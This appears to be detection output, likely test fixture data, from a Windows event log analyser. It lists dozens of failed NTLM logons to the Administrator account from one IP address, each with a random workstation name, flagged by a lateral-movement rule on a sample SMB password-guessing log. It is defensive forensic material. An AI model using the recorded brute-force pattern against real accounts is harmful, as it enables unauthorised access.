+2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qTp1BwPv8XiK2mrG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rnb19AXxM5ArcLxX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUS5CKq2W1rkq46d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FzKSUVdsC5eENWDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QFL07Mhy4iw5psBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMpitnzLXDLSXL73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSfaPdcsiRQoGYYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJRP4bS9Qgg06Z5P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3Z4veMNKngHUDoRf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmF0YFgAMSRotb1y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DmrbO3dZw46DgmZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qg4CMwLpfzLrvDPj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKDKUXNNhuSqRiTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cBocrjNXjmuPCKRJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: loCrAXibgVxcOtCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZ7pHOJeOExrON2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MeucKpaodpmdsqhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LRlmBeBlV6n4MQyo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8FYOF6HxJHqm7GW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9tBtz1GYn5J8sbFH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qn8PlxEzIu9AKUgt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdjqlNDU3U150UAw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esaTfuwuiFAkIVs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y4LbVQ5ytgVCqFmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rWoX76sgYTVwxkD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQFJRRYn6sjYK5cD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wyVuBGEFGJqImQ7W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pRvnyVGxG8i0e3PQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X6Hv2fj43a8j1O2P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: myP4zVFyw2qE1SV7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lpmBcVilH72dYF7E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jd9hKGDxLcnZphlL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OmXgOD9kaGJ4PIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BpQtWW0fAEzNH28B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EgNkY8LKSWcnLM00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8S1dUwb3HjOnEs9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49ZKcnswdISJDwbS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qOuYmww71pTM0l3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PUHoGgmXKRJknRZG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6yf8LSkcwBP9s1mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmH2AMDmkZVbCt8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I23o9EQLpPpn9RlY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrEVj3DB1prpOtnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Iau1IHKxWRsqQaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdPC9LVhZS2l27XF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxcofRpjCFme3mg2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e1VnQLbETh1GgX0c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbdPYXx8mx4SV9G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcv3HWid3auIu7cY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2OviUvdOmk5HON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bVBSORhgFwTy2TWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DsIhCEZcfYenufvf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDadVFtE4toNiagy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnydJjDBdzJWqmWa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW8im2IhNzrGoSFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTzlqq9HLEX6wzdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz98aGXd0fdVzmTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2zOy64cp6dXelNl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X1BflxNjQRNopjb4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 401ulFeuzCtp5lPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p0SIzJrzkseFB1j8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cyQMxtEdbud8iJLI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gbjIqxD4E6fYsGx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEeZEcj63sBddCsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiATfqYtrH9LoqR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PG3HB3GqFwQFLdcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G8NU6WRdrq9DxM6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cvZKIkI2aeBzbwe0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EE7AL3nJ7qsnk4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feu34D0VvoMrnWzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrNRIpCpmAV3npax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zpxgEvvoC0stFdTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
